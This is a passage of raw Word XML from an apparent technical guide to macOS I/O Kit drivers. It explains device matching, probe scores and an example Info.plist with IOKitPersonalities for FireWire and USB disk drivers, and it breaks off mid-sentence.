      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IOCMDQ_ACTION</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VM_KERNEL_UNSLIDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inAction</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uintptr_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> owner</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openGate</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sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> res</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90B8A" w:rsidRPr="00B90B8A" w:rsidRDefault="00B90B8A" w:rsidP="00B90B8A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90B8A" w:rsidRPr="00B90B8A" w:rsidRDefault="00B90B8A" w:rsidP="00B90B8A"/>
    <w:p w:rsidR="00EE2828" w:rsidRDefault="00DE76FF" w:rsidP="00EE2828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc445313298"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Device Reconginzation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="004C5F68" w:rsidRDefault="004C5F68" w:rsidP="004C5F68">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="260830DC" wp14:editId="6B179126">
            <wp:extent cx="5274310" cy="566866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668662"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A3AC6" w:rsidRDefault="004A3AC6" w:rsidP="004A3AC6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="004C5F68">
        <w:t>The sequence of I/O Kit driver methods called in a driver's lifecycle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A3AC6" w:rsidRDefault="004A3AC6" w:rsidP="004C5F68"/>
    <w:p w:rsidR="004C5F68" w:rsidRPr="004C5F68" w:rsidRDefault="004C5F68" w:rsidP="004C5F68"/>
    <w:p w:rsidR="00DE76FF" w:rsidRDefault="00DE76FF" w:rsidP="00DE76FF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOProviderClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00787949">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76FF" w:rsidRDefault="00DE76FF" w:rsidP="00DE76FF">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440"/>
      </w:pPr>
      <w:r>
        <w:t>1. The user connects a USB device to the computer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76FF" w:rsidRDefault="00DE76FF" w:rsidP="00DE76FF">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440"/>
      </w:pPr>
      <w:r>
        <w:t>2. A new instance of</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE76FF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> IOUSBDevice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is created to represent the device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76FF" w:rsidRDefault="00DE76FF" w:rsidP="00DE76FF">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440"/>
      </w:pPr>
      <w:r>
        <w:t>3. The I/O Kit iterates over all drivers that contain a matching dictionary listing a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76FF" w:rsidRDefault="00DE76FF" w:rsidP="00DE76FF">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440"/>
      </w:pPr>
      <w:r>
        <w:t>provider class of IOUSBDevice.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76FF" w:rsidRDefault="00DE76FF" w:rsidP="00DE76FF">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. The IOUSBDevice examines the entire contents of the matching dictionary for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76FF" w:rsidRDefault="00DE76FF" w:rsidP="00DE76FF">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440"/>
      </w:pPr>
      <w:r>
        <w:t>the driver.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76FF" w:rsidRDefault="00DE76FF" w:rsidP="00DE76FF">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440"/>
      </w:pPr>
      <w:r>
        <w:t>5. If the requested properties of the matching dictionary correspond to the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76FF" w:rsidRDefault="00DE76FF" w:rsidP="00DE76FF">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440"/>
      </w:pPr>
      <w:r>
        <w:t>properties of the device, the driver is added to a list of potential drivers for the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76FF" w:rsidRDefault="00DE76FF" w:rsidP="00EE47C5">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440"/>
      </w:pPr>
      <w:r>
        <w:t>device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00766C5B" w:rsidRDefault="00766C5B" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>probe</w:t>
      </w:r>
      <w:r w:rsidRPr="00787949">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00766C5B" w:rsidRDefault="00766C5B" w:rsidP="00766C5B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLineChars="150" w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00766C5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Following the preceding steps, the I/O Kit has narrowed the list of drivers for th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e device down to an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00766C5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>array of potential matches. To determine the best driver for the hardware device, the I/O Kit uses the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00766C5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>notion of a “probe score” for each driver. Each driver nominates a probe score that provides a relative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00766C5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>measure, in some way, of that driver’s suitability for the device. The driver with the highest probe score</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00766C5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is the one that is ultimately chosen to work with the device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxxInfo.plist file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;key&gt;IOKitPersonalities&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;dict&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;key&gt;MyExternalDiskFireWire&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;dict&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w:t>
      </w:r>
      <w:r w:rsidRPr="00F94E51">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CFBundleIdentifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&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w:t>
      </w:r>
      <w:r w:rsidRPr="00F94E51">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>com.mycompany.driver.MyExternalDiskDriver</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&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IOClass&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w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>com_mycompany_driver_MyExternalDiskDriver</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&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w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IOProviderClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&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IOFireWireUnit&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Unit_SW_Version&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integer&gt;1111&lt;/integer&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lastRenderedPageBreak/>
        <w:t>&lt;key&gt;Unit_Spec_ID&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integer&gt;2222&lt;/integer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/dict&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;key&gt;MyExternalDiskUSB&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;dict&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CFBundleIdentifier&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com.mycompany.driver.MyExternalDiskDriver&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IOClass&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w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>com_mycompany_driver_MyExternalDiskDriverUSB</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&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w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IOProviderClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&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string&gt;IOUSBDevice&lt;/string&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idProduct&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integer&gt;3333&lt;/integer&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idVendor&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integer&gt;4444&lt;/integer&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key&gt;IOProbeScore&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="840" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;integer&gt;9000&lt;/integer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/dict&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/dict&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The driver class </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>com_mycompany_driver_MyExternalDiskDriver</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be instantiated and given a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chance to probe the device whenever a FireWire device with a unit software version of 1111 and a unit</w:t>
      </w:r>
      <w:r>
